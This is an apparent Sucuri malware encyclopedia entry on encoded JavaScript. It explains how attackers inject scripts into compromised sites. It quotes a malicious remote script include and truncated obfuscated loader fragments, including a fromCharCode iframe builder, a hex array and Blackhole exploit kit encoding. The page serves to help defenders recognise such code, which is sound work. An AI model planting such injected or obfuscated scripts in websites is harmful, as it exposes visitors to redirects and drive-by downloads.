Sucuri Docs > Malware Encyclopedia > Encoded JavaScript

Encoded JavaScript

JavaScript is a coding language that can be executed directly by the browser and many other applications that support it such as: PDF, email readers, etc.

Javascript malware

Because it is a full programming language executed by the browser, attackers use it heavily to run malicious code from the compromised site. It can range from simple remote source includes, to heavily obfuscated payloads to redirect users to spam, exploit kits (drive by downloads), fake AV and anything else you can imagine.

Simple remote includes

This code loads whatever content is inside rec-creations.com/player.js and is executed by the browser of the victim.

<script type="text/javascript" src="http://rec-creations.com/player.js"...

Encoded JavaScript

There are so many variations, ranging from an iframe builder hidden like this:

s  =  String[c+'r'+"omChar"+'C'+'o'+"d'+'e'] (70, 81,69,87 ,79,71,80,86,16,89,84,75,86,  71,10,9,30,69,71,80,86,71,84,32,30,74,19,32,50

To a remote code including hidden in hexadecimal:

var _0x4470=[x39 x3Dx31x2Ex64 x28x27x35x27x29x3Bx62x28x21x39..

Or to a more complex blackhole exploit kit enconding type:

<script>i=0;  try{prototype;}catch(z){h="harCode" ;f=["-33c-33c63c60c- 10c-2c58c69c5 7c75c67c59c68c7
Was this article helpful?